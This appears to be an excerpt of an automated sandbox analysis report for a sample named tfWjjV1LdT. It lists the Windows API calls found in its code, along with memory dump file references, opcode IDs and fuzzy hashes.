                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: ffaf8c922f291f37ee09ad0863f32ac74f962191212f45a8aa5a39f9f8f82893
                                                            • Instruction ID: 77acadb1626f7480bf126594a8669e0a1daf42b358ca3aac4e3e5ecf4e6c2bef
                                                            • Opcode Fuzzy Hash: ffaf8c922f291f37ee09ad0863f32ac74f962191212f45a8aa5a39f9f8f82893
                                                            • Instruction Fuzzy Hash: 9031B434610108AFEFA09A5CCC45BF877A5EB06350F544112FA15E62E1CE7CF9C09757
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0071AB60
                                                            • GetWindowRect.USER32(?,?), ref: 0071ABD6
                                                            • PtInRect.USER32(?,?,0071C014), ref: 0071ABE6
                                                            • MessageBeep.USER32(00000000), ref: 0071AC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 9f0daf691a3cd21bae834b09fe8a94d82b4a869faafeeaa967e949d4383e51e0
                                                            • Instruction ID: 9e77c19b3417b83baa5596e5acfeed1d04773bf455dcf8ee9dc25bf12acf8d85
                                                            • Opcode Fuzzy Hash: 9f0daf691a3cd21bae834b09fe8a94d82b4a869faafeeaa967e949d4383e51e0
                                                            • Instruction Fuzzy Hash: F5416170601219EFCB21DF5CD894AE97BF6FB49311F1480A5E4159B2A1D738A881CBA2
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006F0B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 006F0B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006F0BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006F0BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
                                                            • Instruction ID: f3434602075986d8e5fd3935d61e968cce80cdc67a4426d0e1fee2fa619ac84d
                                                            • Opcode Fuzzy Hash: 97acd75d246a9250857afd4c72cb5dd647d37c12b8f3523322109af52d44938f
                                                            • Instruction Fuzzy Hash: A6316C70D4031CAFFF308B298C05BFABBA7AB45318F14835AF680522D3C37A89559755
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 006F0C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 006F0C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 006F0CE1
                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 006F0D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
                                                            • Instruction ID: d2f827c14605326d33ccc4a072c2104f29bf8a6f30f7cd9702151d2324cb8811
                                                            • Opcode Fuzzy Hash: a121f8ee64c42ead1890e1874d69154c2c2746db417ddc61eb19069f74ab95c0
                                                            • Instruction Fuzzy Hash: 5B31587094431CAEFF308B698C157FEBBA7AF49320F14831EE694522D3C33999558755
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C61FB
                                                            • __isleadbyte_l.LIBCMT ref: 006C6229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C6257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006C628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: e43ce311e9bc2e159ae4d75c27df9c6f143c0549c5770f05ee5807298bed7c43
                                                            • Instruction ID: 14a742546517d1be47782577e26ee6c718a356bd3bb01608bd7ddb92e16f8c56
                                                            • Opcode Fuzzy Hash: e43ce311e9bc2e159ae4d75c27df9c6f143c0549c5770f05ee5807298bed7c43
                                                            • Instruction Fuzzy Hash: C431CE31604246AFDB218F69CC48FBA7BAAFF41310F15402CF864872A1E735DA91DB98
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00714F02
                                                              • Part of subcall function 006F3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006F365B
                                                              • Part of subcall function 006F3641: GetCurrentThreadId.KERNEL32 ref: 006F3662
                                                              • Part of subcall function 006F3641: AttachThreadInput.USER32(00000000,?,006F5005), ref: 006F3669
                                                            • GetCaretPos.USER32(?), ref: 00714F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 00714F4E
                                                            • GetForegroundWindow.USER32 ref: 00714F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 551b36dc17493eeed563482666ca0126d518633fc8a91c69854c629145e17424
                                                            • Instruction ID: b61372312ff9784a33dfb5cd8d6b115688d7f06e30843c9b6057c496582eee09
                                                            • Opcode Fuzzy Hash: 551b36dc17493eeed563482666ca0126d518633fc8a91c69854c629145e17424
                                                            • Instruction Fuzzy Hash: 0D312C71D00108AFCB40EFA9C9859EFB7FEEF99300F10446EE415E7241EA759E458BA4
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • GetCursorPos.USER32(?), ref: 0071C4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006CB9AB,?,?,?,?,?), ref: 0071C4E7
                                                            • GetCursorPos.USER32(?), ref: 0071C534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006CB9AB,?,?,?), ref: 0071C56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: d6fe52c799384b1d7ded31277471532cb3811a670ec5babbc45b93951a80653a
                                                            • Instruction ID: efb7a51e872c4a4ff7ef23dfce0141cd74d764cac722f408449d72fff963db76
                                                            • Opcode Fuzzy Hash: d6fe52c799384b1d7ded31277471532cb3811a670ec5babbc45b93951a80653a
                                                            • Instruction Fuzzy Hash: CD31A735500458BFCF16CF9CD854DEA7BB7EB09310F548069F9058B2A1C7396DA0DBA4
                                                            APIs
                                                              • Part of subcall function 006E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8121
                                                              • Part of subcall function 006E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E812B
                                                              • Part of subcall function 006E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E813A
                                                              • Part of subcall function 006E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8141
                                                              • Part of subcall function 006E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E86A3
                                                            • _memcmp.LIBCMT ref: 006E86C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E86FC
                                                            • HeapFree.KERNEL32(00000000), ref: 006E8703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 59a1fdc158a94917fcc3da4a63bfdfe116029d87717ba13ef180a79771cb03a9
                                                            • Instruction ID: e40bf867e3c9c1d1d3bb18b5571d0b34ad12523f3bc7ee4b0fb7b9184983402d
                                                            • Opcode Fuzzy Hash: 59a1fdc158a94917fcc3da4a63bfdfe116029d87717ba13ef180a79771cb03a9
                                                            • Instruction Fuzzy Hash: 2621A471D41249EFDB10DF99C949BEEB7B9FF54308F158059E448A7240DB31AE05CB54
                                                            APIs
                                                            • __setmode.LIBCMT ref: 006B09AE
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50
                                                            • _fprintf.LIBCMT ref: 006B09E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 006E5DBB
                                                              • Part of subcall function 006B4AAA: _flsall.LIBCMT ref: 006B4AC3
                                                            • __setmode.LIBCMT ref: 006B0A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 1df36e92690e4f9ba927a0e45b6f12aec979d116e164b0767965539a65e818ef
                                                            • Instruction ID: e083597968ec207ac2a2d3af18dc4c593d9e976aa4d282335da6b66dbad76107
                                                            • Opcode Fuzzy Hash: 1df36e92690e4f9ba927a0e45b6f12aec979d116e164b0767965539a65e818ef
                                                            • Instruction Fuzzy Hash: 2F1136B2A046086FEB44B7B89C879FE7BAF9F41320F20015DF10557283EE70588287AD
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007017A3
                                                              • Part of subcall function 0070182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0070184C
                                                              • Part of subcall function 0070182D: InternetCloseHandle.WININET(00000000), ref: 007018E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                            • Instruction ID: 9c3981818baff76ec13fa9b90cbe0f6155b84fecffe1ba43f693fdbcb42a2cae
                                                            • Opcode Fuzzy Hash: 819036aadfec4f457c65f96ffa6ae940980c67ab96323092917d361d7cd33015
                                                            • Instruction Fuzzy Hash: EE21D732200601FFDB125F64CC05FBAB7E9FF48B10F508229F905966D1DB7999119790
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,0071FAC0), ref: 006F3A64
                                                            • GetLastError.KERNEL32 ref: 006F3A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006F3A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0071FAC0), ref: 006F3ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: 223be4851fbb6ffa4042b8e4a1121a93fe0eda32d910be8ea24126eb97a7233a
                                                            • Instruction ID: 7b68bedc2fc8ad5812d4c6b2fabcd631a3ee67586bf5727391052d298375cdb9
                                                            • Opcode Fuzzy Hash: 223be4851fbb6ffa4042b8e4a1121a93fe0eda32d910be8ea24126eb97a7233a
                                                            • Instruction Fuzzy Hash: 842191745082159F8700EF39C8818BAB7E9BE56364F108A2DF599C73E1D731DA46CB46
                                                            APIs
                                                            • _free.LIBCMT ref: 006C5101
                                                              • Part of subcall function 006B571C: __FF_MSGBANNER.LIBCMT ref: 006B5733
                                                              • Part of subcall function 006B571C: __NMSG_WRITE.LIBCMT ref: 006B573A
                                                              • Part of subcall function 006B571C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000000,?,?,?,006B0DD3,?), ref: 006B575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 168dfac6e901eb54d297dee3559e6f2b50157cdc8d4f7727f677ca4ac235dbec
                                                            • Instruction ID: 0b931f564060435ca3086ef617a40ede732ca02ade610d720d67afe849910a07
                                                            • Opcode Fuzzy Hash: 168dfac6e901eb54d297dee3559e6f2b50157cdc8d4f7727f677ca4ac235dbec
                                                            • Instruction Fuzzy Hash: B011E7B1500A15AFCB712F74AC09FFE3B9ADF003A1B14452EF9069B650DE34D9C18798
                                                            APIs
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
                                                              • Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 00706399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 007063A4
                                                            • _memmove.LIBCMT ref: 007063D1
                                                            • inet_ntoa.WSOCK32(?), ref: 007063DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 5ed0d3f11390d4fd7bf0667e344073367acca3378e622c27863c2aead0b37ba6
                                                            • Instruction ID: ed077d8cc425e49fa2bb7bb5b8dce1a1f83b76c51e5e32723121f77737cf5d64
                                                            • Opcode Fuzzy Hash: 5ed0d3f11390d4fd7bf0667e344073367acca3378e622c27863c2aead0b37ba6
                                                            • Instruction Fuzzy Hash: 5B118E31900109EFCF04FBA8DD46CEEB7BDAF04320B008129F506A71A1DB34AE14CB65
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006E8B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                            • Instruction ID: ce188be3c85f8b632a6ddb4fb10728dc7a9d053fd71762fb1881f27e4e434b93
                                                            • Opcode Fuzzy Hash: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
                                                            • Instruction Fuzzy Hash: 6B111C79901218FFDB11DF95CC85F9DBB75FB48710F204095E904B7290DA716E11DB94
                                                            APIs
                                                              • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                            • GetClientRect.USER32(?,?), ref: 006CB5FB
                                                            • GetCursorPos.USER32(?), ref: 006CB605
                                                            • ScreenToClient.USER32(?,?), ref: 006CB610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 612fdde8d8c161f24cfbf7da72f690f08e28c9055252fe5b5fc4795baff7c9d9
                                                            • Instruction ID: 423182b24db2fdea47b3e18cc797887a5a43d4ae6b96546ae34ed47d7d7da243
                                                            • Opcode Fuzzy Hash: 612fdde8d8c161f24cfbf7da72f690f08e28c9055252fe5b5fc4795baff7c9d9
                                                            • Instruction Fuzzy Hash: 04112B3550001AEBCF00EFA8D8859FE77BAEB06301F504465F901EB641D734BA918BA9
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006ED84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006ED864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006ED879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006ED897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: fb40364bd3d7206c398476d23f2070723d2b9902f6cdab844740ecd9c9665e09
                                                            • Instruction ID: 3e3058a0fb09f5c81a68fc4bece4fe74263fe5edfa2a38abb0207352f31a3c70
                                                            • Opcode Fuzzy Hash: fb40364bd3d7206c398476d23f2070723d2b9902f6cdab844740ecd9c9665e09
                                                            • Instruction Fuzzy Hash: 221161B5606354EBE320CF56DC08F93BBBDEB00B00F108569E916D6190D7B5E5499BA1
                                                            APIs
                                                            Memory Dump Source
